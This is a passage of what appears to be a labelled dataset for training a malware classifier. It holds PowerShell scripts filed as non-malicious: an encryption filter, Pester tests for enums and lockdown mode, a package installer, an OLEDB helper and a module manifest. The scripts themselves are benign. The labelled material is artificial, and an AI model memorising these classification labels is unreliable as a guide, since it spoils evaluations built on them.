# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQA9S6eO4HsfB00XpOgPabcN3QZeyipgilcQ
# SDZ8g6VCv9FVHzdSq9XpAsljZSKNWSClhJEz5Oo3Um/taPnobF+8CkAdkcLQhLdk
# Shfr91kzy9vDPrOmlCA2FQ9jVhFaat2QM33z1p+GCP5tuvirFaUWzUWVDFOpo/O5
# zDpzoPYtTr0cFg3uXaRLT54UQ3Y4uPYXqn6wunZtUQRMiJMzxpUlvdfWGUtCvnW3
# eDBikDkix1XE98VcYIz2+5fdcvrHVeUarGXy4LRtwzmwpsCtUh7tR6whCrVYkb6F
# udBdWM7TVvji7pGgfjesgnASaD/ChLux66PGwaIaF+xLzk0bNxsAj0uhd6QdWr6T
# T39m/SNZ1/UXU7kzEod0vAY3mIn8X5A4I+9/e1nBNpURJ6YiDKQd5YVgxsuZCWv4
# Qwb0mXhHIe9CubfSqZjvDawf2I229N3LstDJUSr1vGFB8iQ5W8ZLM5PwT8vtsKEB
# wHEYmwsuWmsxkimIF5BQbSzg9wz1O6jdWTxGG0OUt1cXWOMJUJzyEH4WSKZHOx53
# qcAvD9h0U6jEF2fuBjtJ/QDrWbb4urvAfrvqNn9lH7gVPplqNPDIvQ8DkZ3lvbQs
# Yqlz617e76ga7SY0w71+QP165CPdzUY36et2Sm4pvspEK8hllq3IYcyX0v897+X9
# YeecM1Pb1jCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN
# MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkYwMDItMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQBr
# i943cFLH2TfQEfB05SLICg74CKCBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6hRbQDAiGA8yMDI0MDYxMjE3Mzcw
# NFoYDzIwMjQwNjEzMTczNzA0WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDqFFtA
# AgEAMAcCAQACAgnHMAcCAQACAhQ2MAoCBQDqFazAAgEAMDYGCisGAQQBhFkKBAIx
# KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI
# hvcNAQELBQADggEBAJvcRS7um6Ez5BBk0dXFSlYl2wfjoX3S3T4HLU05LIIMK/U7
# JGOch8nqwgYQPOBy2AgeOcLsS8JG+tXqby+r2ATPnvig/ZvzaN0gnK5tGBasHPoc
# TkKHB9cOvx/FJZ3X46mP+3c6zV7za/3/Bn+adJn//8wJ2m4ctdrBD5REUxfGZovd
# DDyDUOt9LeAY1ulZVd66cdvtNBQcjmuswWl+RTlQ7NQMPx7YTniHqtpi51AR8rHm
# t4qQkA/QX1W6X0s/Lzr/ufCiMQ0uZR1lvo7nVFrk6y9n5pAoSITblvRqh9h7sE5s
# Lf29MUXgzF5BmC3rEx68ZQKk2RRKqIL2LdW5jQ0xggQNMIIECQIBATCBkzB8MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy
# b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAfI+MtdkrHCRlAABAAAB8jAN
# BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G
# CSqGSIb3DQEJBDEiBCAs1jKPlnPMPAg9r/DRGB+FJ9TkopkqIAQYnf3Y+gHSmDCB
# +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIPjaPh0uMVJc04+Y4Ru5BUUbHE4s
# uZ6nRHSUu0XXSkNEMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
# MTACEzMAAAHyPjLXZKxwkZQAAQAAAfIwIgQgg5FotLHecbCbi6cUZY/oaPwhtjA9
# z6nJCdeXLrd/R7IwDQYJKoZIhvcNAQELBQAEggIAoF109NU6drvApwjzF44Pzrir
# 0YNcMczEqV+4Z7fKt4Lwv1zQsU5XBuTWK8HjDC90PNFqMehxtIWqMWlK84GVWbDN
# Pfoal61wmkOy4k9+L2MJA1sjr66A2i2x6aQxa3WBmLdHvlf5vkWIQz4QUFjv/pOR
# e057nU1Gk5sx/6R+byh5NrGZtGUZ5Wli8LyuA5U+cXXzlsXc4pMJqBpE9x5+kqA1
# QlwyZTqv4ngipLImrbc2BTds0xs/6YBecvK+hmxeb2QFcaIdCw49hu2IZpNjjwBS
# Ge46eI3BtCkV5VIzxD3K5z5ZrBDJjPkGunKIOMknBYyTGUmddy7aPKEJDXD+u4wk
# l3oJ2Yhbw20f3FO6Km+Ks9/CnjvVPafjdzi7LofC90tz8Eo7HVHqD02EqhZuBv12
# fCKFFwRa4JNnZDpg0cgNI3BY3dJgndEuUbWJgkmqvQWTDCfwGgecs9R4teWSi6oh
# 2uR9ymArIF5MQzu7+pa9va+O88uYBxDS5Zle4pWgLANTNXqrPBBm34VBNuq078/F
# eDrkISOehf1wiMsTefj1hwfNpvRrTdhDhm8IqHKe5xj9O/ciFpbgnQmvwYICf8YF
# xK5v9wB6uRCKibKbWVxCm4NJW63tbgDQc4ezk2WRg1cG1kK8YSpQs2VJn5msEL+l
# XM6CupATs2gBy8eJzTw=
# SIG # End signature block
|
combined_dataset/train/non-malicious/1266.ps1
|
1266.ps1
|
filter Protect-CString
{
[CmdletBinding()]
param(
[Parameter(Mandatory = $true, Position=0, ValueFromPipeline = $true)]
[object]
$String,
[Parameter(Mandatory=$true,ParameterSetName='DPAPICurrentUser')]
[Switch]
$ForUser,
[Parameter(Mandatory=$true,ParameterSetName='DPAPILocalMachine')]
[Switch]
$ForComputer,
[Parameter(Mandatory=$true,ParameterSetName='DPAPIForUser')]
[Management.Automation.PSCredential]
$Credential,
[Parameter(Mandatory=$true,ParameterSetName='RSAByCertificate')]
[Security.Cryptography.X509Certificates.X509Certificate2]
$Certificate,
[Parameter(Mandatory=$true,ParameterSetName='RSAByThumbprint')]
[string]
$Thumbprint,
[Parameter(Mandatory=$true,ParameterSetName='RSAByPath')]
[string]
$PublicKeyPath,
[Parameter(ParameterSetName='RSAByCertificate')]
[Parameter(ParameterSetName='RSAByThumbprint')]
[Parameter(ParameterSetName='RSAByPath')]
[Switch]
$UseDirectEncryptionPadding,
[Parameter(Mandatory=$true,ParameterSetName='Symmetric')]
[object]
$Key
)
Set-StrictMode -Version 'Latest'
Use-CallerPreference -Cmdlet $PSCmdlet -Session $ExecutionContext.SessionState
Add-Type -AssemblyName 'System.Security'
if( $String -is [System.Security.SecureString] )
{
$stringBytes = [Carbon.Security.SecureStringConverter]::ToBytes($String)
}
else
{
$stringBytes = [Text.Encoding]::UTF8.GetBytes( $String.ToString() )
}
try
{
if( $PSCmdlet.ParameterSetName -like 'DPAPI*' )
{
if( $PSCmdlet.ParameterSetName -eq 'DPAPIForUser' )
{
$protectStringPath = Join-Path -Path $CarbonBinDir -ChildPath 'Protect-String.ps1' -Resolve
$encodedString = Protect-CString -String $String -ForComputer
$argumentList = '-ProtectedString {0}' -f $encodedString
Invoke-CPowerShell -ExecutionPolicy 'ByPass' -NonInteractive -FilePath $protectStringPath -ArgumentList $argumentList -Credential $Credential |
Select-Object -First 1
return
}
else
{
$scope = [Security.Cryptography.DataProtectionScope]::CurrentUser
if( $PSCmdlet.ParameterSetName -eq 'DPAPILocalMachine' )
{
$scope = [Security.Cryptography.DataProtectionScope]::LocalMachine
}
$encryptedBytes = [Security.Cryptography.ProtectedData]::Protect( $stringBytes, $null, $scope )
}
}
elseif( $PSCmdlet.ParameterSetName -like 'RSA*' )
{
if( $PSCmdlet.ParameterSetName -eq 'RSAByThumbprint' )
{
$Certificate = Get-ChildItem -Path ('cert:\*\*\{0}' -f $Thumbprint) -Recurse | Select-Object -First 1
if( -not $Certificate )
{
Write-Error ('Certificate with thumbprint ''{0}'' not found.' -f $Thumbprint)
return
}
}
elseif( $PSCmdlet.ParameterSetName -eq 'RSAByPath' )
{
$Certificate = Get-CCertificate -Path $PublicKeyPath
if( -not $Certificate )
{
return
}
}
$rsaKey = $Certificate.PublicKey.Key
if( $rsaKey -isnot ([Security.Cryptography.RSACryptoServiceProvider]) )
{
Write-Error ('Certificate ''{0}'' (''{1}'') is not an RSA key. Found a public key of type ''{2}'', but expected type ''{3}''.' -f $Certificate.Subject,$Certificate.Thumbprint,$rsaKey.GetType().FullName,[Security.Cryptography.RSACryptoServiceProvider].FullName)
return
}
try
{
$encryptedBytes = $rsaKey.Encrypt( $stringBytes, (-not $UseDirectEncryptionPadding) )
}
catch
{
if( $_.Exception.Message -match 'Bad Length\.' -or $_.Exception.Message -match 'The parameter is incorrect\.')
{
[int]$maxLengthGuess = ($rsaKey.KeySize - (2 * 160 - 2)) / 8
Write-Error -Message ('Failed to encrypt. String is longer than maximum length allowed by RSA and your key size, which is {0} bits. We estimate the maximum string size you can encrypt with certificate ''{1}'' ({2}) is {3} bytes. You may still get errors when you attempt to decrypt a string within a few bytes of this estimated maximum.' -f $rsaKey.KeySize,$Certificate.Subject,$Certificate.Thumbprint,$maxLengthGuess)
return
}
else
{
Write-Error -Exception $_.Exception
return
}
}
}
elseif( $PSCmdlet.ParameterSetName -eq 'Symmetric' )
{
$Key = ConvertTo-Key -InputObject $Key -From 'Protect-CString'
if( -not $Key )
{
return
}
$aes = New-Object 'Security.Cryptography.AesCryptoServiceProvider'
try
{
$aes.Padding = [Security.Cryptography.PaddingMode]::PKCS7
$aes.KeySize = $Key.Length * 8
$aes.Key = $Key
$memoryStream = New-Object 'IO.MemoryStream'
try
{
$cryptoStream = New-Object 'Security.Cryptography.CryptoStream' $memoryStream,$aes.CreateEncryptor(),([Security.Cryptography.CryptoStreamMode]::Write)
try
{
$cryptoStream.Write($stringBytes,0,$stringBytes.Length)
}
finally
{
$cryptoStream.Dispose()
}
$encryptedBytes = Invoke-Command -ScriptBlock {
$aes.IV
$memoryStream.ToArray()
}
}
finally
{
$memoryStream.Dispose()
}
}
finally
{
$aes.Dispose()
}
}
return [Convert]::ToBase64String( $encryptedBytes )
}
finally
{
$stringBytes.Clear()
}
}
|
combined_dataset/train/non-malicious/2076.ps1
|
2076.ps1
|
Describe 'enums' -Tags "CI" {
Context 'basic enums' {
enum E1
{
e0
e1
e2
}
It "has correct value 0" { [E1]::e0 | Should -Be ([E1]0) }
It "has correct value 1" { [E1]::e1 | Should -Be ([E1]1) }
It "has correct value 2" { [E1]::e2 | Should -Be ([E1]2) }
It "cast from string" { [E1]::e1 | Should -Be 'e1' }
It "cast to string" { 'e2' | Should -Be ([E1]::e2) }
}
Context 'Basic enum with initial value' {
enum E2
{
e0
e1 = 5
e2
}
It "has correct value 0" { [E2]::e0 | Should -Be ([E2]0) }
It "has correct value 5" { [E2]::e1 | Should -Be ([E2]5) }
It "has correct value 6" { [E2]::e2 | Should -Be ([E2]6) }
It "cast from string" { [E2]::e1 | Should -Be 'e1' }
It "cast to string" { 'e2' | Should -Be ([E2]::e2) }
}
Context 'Basic enum with initial value expression' {
enum E3
{
e0
e1 = 5
e2 = [int]::MaxValue
e3 = 1
}
It "has correct value 0" { [E3]::e0 | Should -Be ([E3]0) }
It "has correct value 5" { [E3]::e1 | Should -Be ([E3]5) }
It "has correct value [int]::MaxValue" { [E3]::e2 | Should -Be ([E3]([int]::MaxValue)) }
It "has correct value 1" { [E3]::e3 | Should -Be ([E3]1) }
It "cast from string" { [E3]::e2 | Should -Be 'e2' }
It "cast to string" { 'e3' | Should -Be ([E3]::e3) }
}
Context 'Enum with complicated initial value' {
enum E4
{
e0 = [E5]::e0 + 2
}
enum E5
{
e0 = [E6]::e0 + 2
}
enum E6
{
e0 =38
}
It 'E4 has correct value' { [E4]::e0 | Should -Be ([E4]42) }
It 'E5 has correct value' { [E5]::e0 | Should -Be ([E5]40) }
It 'E6 has correct value' { [E6]::e0 | Should -Be ([E6]38) }
}
Context 'Enum with non-default underlying type' {
enum EX1 : byte { A;B;C;D }
enum EX2 : sbyte { A;B;C;D }
enum EX3 : short { A;B;C;D }
enum EX4 : ushort { A;B;C;D }
enum EX5 : int { A;B;C;D }
enum EX6 : uint { A;B;C;D }
enum EX7 : long { A;B;C;D }
enum EX8 : ulong { A;B;C;D }
It 'EX1 has the specified underlying type' { [Enum]::GetUnderlyingType([EX1]) | Should -Be ([byte]) }
It 'EX2 has the specified underlying type' { [Enum]::GetUnderlyingType([EX2]) | Should -Be ([sbyte]) }
It 'EX3 has the specified underlying type' { [Enum]::GetUnderlyingType([EX3]) | Should -Be ([short]) }
It 'EX4 has the specified underlying type' { [Enum]::GetUnderlyingType([EX4]) | Should -Be ([ushort]) }
It 'EX5 has the specified underlying type' { [Enum]::GetUnderlyingType([EX5]) | Should -Be ([int]) }
It 'EX6 has the specified underlying type' { [Enum]::GetUnderlyingType([EX6]) | Should -Be ([uint]) }
It 'EX7 has the specified underlying type' { [Enum]::GetUnderlyingType([EX7]) | Should -Be ([long]) }
It 'EX8 has the specified underlying type' { [Enum]::GetUnderlyingType([EX8]) | Should -Be ([ulong]) }
}
Context 'Enum with negative user-specified values' {
enum V1 {
A = -4
B = [int]::MinValue
C
}
It 'Negative values are correctly assigned to members' {
[V1]::A.value__ | Should -Be -4
[V1]::B.value__ | Should -Be -2147483648
[V1]::C.value__ | Should -Be -2147483647
}
}
}
Describe 'Basic enum errors' -Tags "CI" {
ShouldBeParseError 'enum' MissingNameAfterKeyword 4
ShouldBeParseError 'enum foo' MissingTypeBody 8
ShouldBeParseError 'enum foo {' MissingEndCurlyBrace 10
ShouldBeParseError 'enum foo { x = }' ExpectedValueExpression 14
ShouldBeParseError 'enum foo { x =' ExpectedValueExpression,MissingEndCurlyBrace 14,10
ShouldBeParseError 'enum foo {} enum foo {}' MemberAlreadyDefined 12
ShouldBeParseError 'enum foo { x; x }' MemberAlreadyDefined 14 -SkipAndCheckRuntimeError
ShouldBeParseError 'enum foo { X; x }' MemberAlreadyDefined 14 -SkipAndCheckRuntimeError
ShouldBeParseError 'enum foo1 { x = [foo2]::x } enum foo2 { x = [foo1]::x }' CycleInEnumInitializers,CycleInEnumInitializers 0,28 -SkipAndCheckRuntimeError
ShouldBeParseError 'enum foo { e = [int]::MaxValue; e2 }' EnumeratorValueOutOfBounds 33 -SkipAndCheckRuntimeError
ShouldBeParseError 'enum foo { e = [int]::MaxValue + 1 }' EnumeratorValueOutOfBounds 15 -SkipAndCheckRuntimeError
ShouldBeParseError 'enum foo : byte { e = -1 }' EnumeratorValueOutOfBounds 22 -SkipAndCheckRuntimeError
ShouldBeParseError 'enum foo { e = $foo }' EnumeratorValueMustBeConstant 15 -SkipAndCheckRuntimeError
ShouldBeParseError 'enum foo { e = "hello" }' CannotConvertValue 15 -SkipAndCheckRuntimeError
ShouldBeParseError 'enum foo { a;b;c;' MissingEndCurlyBrace 10
ShouldBeParseError 'enum foo : string { a }' InvalidUnderlyingType 11 -SkipAndCheckRuntimeError
}
|
combined_dataset/train/non-malicious/1769.ps1
|
1769.ps1
|
Import-Module HelpersSecurity
try
{
$defaultParamValues = $PSDefaultParameterValues.Clone()
$PSDefaultParameterValues["it:Skip"] = !$IsWindows
Describe "Local script debugger is disabled in system lock down mode" -Tags 'CI','RequireAdminOnWindows' {
BeforeAll {
$debuggerTestTypeDef = @'
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace TestRunner
{
public class DebuggerTester
{
private Runspace _runspace;
public int DebuggerStopHitCount
{
private set;
get;
}
public DebuggerTester(Runspace runspace)
{
if (runspace.Debugger == null)
{
throw new PSArgumentException("The provided runspace script debugger cannot be null for test.");
}
_runspace = runspace;
_runspace.Debugger.DebuggerStop += (sender, args) =>
{
DebuggerStopHitCount += 1;
};
}
}
}
'@
$script = @'
"Hello"
Wait-Debugger
"Goodbye"
'@
$scriptFilePath = Join-Path $TestDrive TScript.ps1
$script > $scriptFilePath
Add-Type -TypeDefinition $debuggerTestTypeDef
$TestCasesDisableDebugger = @(
@{
testName = 'Verifies that Set-PSBreakpoint Line is disabled on locked down system'
scriptText = 'Set-PSBreakpoint -Script {0} -Line 1' -f $scriptFilePath
},
@{
testName = 'Verifies that Set-PSBreakpoint Statement is disabled on locked down system'
scriptText = 'Set-PSBreakpoint -Script {0} -Line 1 -Column 1' -f $scriptFilePath
},
@{
testName = 'Verifies that Set-PSBreakpoint Command is disabled on locked down system'
scriptText = 'Set-PSBreakpoint -Command {0}' -f $scriptFilePath
},
@{
testName = 'Verifies that Set-PSBreakpoint Variable is disabled on locked down system'
scriptText = 'Set-PSBreakpoint -Variable HelloVar'
}
)
}
AfterAll {
if (($script:moduleDirectory -ne $null) -and (Test-Path $script:moduleDirectory))
{
try { Remove-Item -Path $moduleDirectory -Recurse -Force -ErrorAction SilentlyContinue } catch { }
}
}
It "<testName>" -TestCases $TestCasesDisableDebugger {
param ($scriptText)
try
{
Invoke-LanguageModeTestingSupportCmdlet -SetLockdownMode
[powershell] $ps = [powershell]::Create([System.Management.Automation.RunspaceMode]::NewRunspace);
$ps.AddScript($scriptText).Invoke()
$expectedError = $ps.Streams.Error[0]
}
finally
{
Invoke-LanguageModeTestingSupportCmdlet -RevertLockdownMode -EnableFullLanguageMode
if ($ps -ne $null) { $ps.Dispose() }
}
$expectedError.FullyQualifiedErrorId | Should Be 'NotSupported,Microsoft.PowerShell.Commands.SetPSBreakpointCommand'
}
It "Verifies that Wait-Debugger is disabled on locked down system" {
try
{
Invoke-LanguageModeTestingSupportCmdlet -SetLockdownMode
[runspace] $runspace = [runspacefactory]::CreateRunspace()
$runspace.Open()
$debuggerTester = [TestRunner.DebuggerTester]::new($runspace)
[powershell] $ps = [powershell]::Create()
$ps.Runspace = $runspace
$null = $ps.AddScript('"Hello"; Wait-Debugger; "Goodbye"').Invoke()
}
finally
{
Invoke-LanguageModeTestingSupportCmdlet -RevertLockdownMode -EnableFullLanguageMode
if ($runspace -ne $null) { $runspace.Dispose() }
if ($ps -ne $null) { $ps.Dispose() }
}
$debuggerTester.DebuggerStopHitCount | Should Be 0
}
}
}
finally
{
if ($null -ne $defaultParamValues)
{
$Global:PSDefaultParameterValues = $defaultParamValues
}
}
|
combined_dataset/train/non-malicious/New-NamedPipe.ps1
|
New-NamedPipe.ps1
|
# .NET 3.5 is required to use the System.IO.Pipes namespace
[reflection.Assembly]::LoadWithPartialName("system.core") | Out-Null
$pipeName = "pipename"
$pipeDir = [System.IO.Pipes.PipeDirection]::InOut
$pipe = New-Object system.IO.Pipes.NamedPipeServerStream( $pipeName, $pipeDir )
|
combined_dataset/train/non-malicious/615.ps1
|
615.ps1
|
param(
[string]$Version,
[string]$Path,
[switch]$Force,
$Update,
[switch]$Uninstall
)
$Configs = @{
Url = "http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=sharepointpowershell&DownloadId=807591&FileTime=130378986116670000&Build=20885"
Path = "$((Get-Location).Path)\"
}
$Configs | ForEach-Object{
try{
$_.Result = $null
if(-not $_.Path){$_.Path = $Path}
$Config = $_
if(-not $Uninstall){
if($_.ConditionExclusion){
$_.ConditionExclusionResult = $(Invoke-Expression $Config.ConditionExclusion -ErrorAction SilentlyContinue)
}
if(($_.ConditionExclusionResult -eq $null) -or $Force){
$_.Downloads = $_.Url | ForEach-Object{
Get-File -Url $_ -Path (Join-Path $Config.Path "SharePointPowerShell.zip")
}
$_.Downloads | ForEach-Object{
& 7za x $(Join-Path $_.Path $_.Filename) -y | Out-Null
}
$_.Downloads | ForEach-Object{
Remove-Item $(Join-Path $_.Path $_.Filename)
}
if($Update){$_.Result = "AppUpdated";$_
}else{$_.Result = "AppInstalled";$_}
}else{
$_.Result = "ConditionExclusion";$_
}
}else{
$_.Result = "AppUninstalled";$_
}
}catch{
$Config.Result = "Error";$Config
}
}
|
combined_dataset/train/non-malicious/Get-OLEDBData.ps1
|
Get-OLEDBData.ps1
|
###########################################################################
# Get-OLEDBData
# --------------------------------------------
# Description: This function is used to retrieve data via an OLEDB data
# connection.
#
# Inputs: $connectstring - Connection String.
# $sql - SQL statement to be executed to retrieve data.
#
# Usage: Get-OLEDBData <connction string> <SQL statement>
#
#Connection String for Excel 2007:
#"Provider=Microsoft.ACE.OLEDB.12.0;Data Source=`"$filepath`";Extended Properties=`"Excel 12.0 Xml;HDR=YES`";"
#Connection String for Excel 2003:
#"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=`"$filepath`";Extended Properties=`"Excel 8.0;HDR=Yes;IMEX=1`";"
#Excel query
#'select * from [sheet1$]'
#Informix
#"password=$password;User ID=$userName;Data Source=$dbName@$serverName;Persist Security Info=true;Provider=Ifxoledbc.2"
#Oracle
#"password=$password;User ID=$userName;Data Source=$serverName;Provider=OraOLEDB.Oracle"
#SQL Server
#"Server=$serverName;Trusted_connection=yes;database=$dbname;Provider=SQLNCLI;"
###########################################################################
function Get-OLEDBData ($connectstring, $sql) {
$OLEDBConn = New-Object System.Data.OleDb.OleDbConnection($connectstring)
$OLEDBConn.open()
$readcmd = New-Object system.Data.OleDb.OleDbCommand($sql,$OLEDBConn)
$readcmd.CommandTimeout = '300'
$da = New-Object system.Data.OleDb.OleDbDataAdapter($readcmd)
$dt = New-Object system.Data.datatable
[void]$da.fill($dt)
$OLEDBConn.close()
return $dt
}
|
combined_dataset/train/non-malicious/sample_52_30.ps1
|
sample_52_30.ps1
|
#
# Module manifest for module 'OCI.PSModules.Goldengate'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Goldengate.dll'
# Version number of this module.
ModuleVersion = '79.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '342128d9-559b-4b8b-9ce9-d9d50eaf7247'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Goldengate Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '79.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Goldengate.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
